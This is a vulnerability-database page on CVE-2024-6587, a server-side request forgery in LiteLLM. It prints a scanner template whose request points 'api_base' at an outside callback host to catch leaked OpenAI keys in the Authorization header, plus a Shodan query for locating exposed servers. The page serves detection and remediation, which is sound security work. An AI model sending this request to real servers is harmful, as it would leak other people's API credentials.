LiteLLM - Server-Side Request Forgery
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| CVE-2024-6587 | 13 Sep 202418:48 | – | circl | |
| LiteLLM 代码问题漏洞 | 13 Sep 202400:00 | – | cnnvd | |
| CVE-2024-6587 | 13 Sep 202415:59 | – | cve | |
| CVE-2024-6587 SSRF in berriai/litellm | 13 Sep 202415:59 | – | cvelist | |
| LiteLLM Server-Side Request Forgery (SSRF) vulnerability | 13 Sep 202418:31 | – | github | |
| CVE-2024-6587 | 13 Sep 202416:15 | – | nvd | |
| GHSA-G26J-5385-HHW3 LiteLLM Server-Side Request Forgery (SSRF) vulnerability | 13 Sep 202418:31 | – | osv | |
| PYSEC-2026-1547 LiteLLM Server-Side Request Forgery (SSRF) vulnerability | 7 Jul 202614:34 | – | osv | |
| PT-2024-37739 | 13 Sep 202400:00 | – | ptsecurity | |
| LiteLLM Server-Side Request Forgery (SSRF) vulnerability | 7 Jul 202614:34 | – | pypa |
10
id: CVE-2024-6587
info:
name: LiteLLM - Server-Side Request Forgery
author: pdresearch,iamnoooob,rootxharsh,lambdasawa
severity: high
description: |
LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.
impact: |
Attackers can exploit SSRF to send requests to arbitrary URLs with OpenAI API keys in the Authorization header, potentially exposing API credentials.
remediation: |
Update LiteLLM to the latest version that addresses the SSRF vulnerability in the chat/completions endpoint.
reference:
- https://huntr.com/bounties/4001e1a2-7b7a-4776-a3ae-e6692ec3d997
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6587
classification:
epss-score: 0.37184
epss-percentile: 0.98384
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:439373620
tags: cve,cve2024,ssrf,openai,litellm,vkev,vuln,ai
http:
- raw:
- |
POST /chat/completions HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"model": "command-nightly",
"messages": [
{
"content": "Hello, how are you?",
"role": "user"
}
],
"api_base": "https://{{interactsh-url}}"
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "Bearer"
# digest: 490a00463044022058ba9c0b4685820113e89e928fac4833da5b9a7b47a2de1d809697f6240ad81d02206f8488030a5de9e2c2452b6f884009d0713506922e89d8fca866502242d8a583:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.17.5
CVSS 37.5
EPSS0.37184
SSVC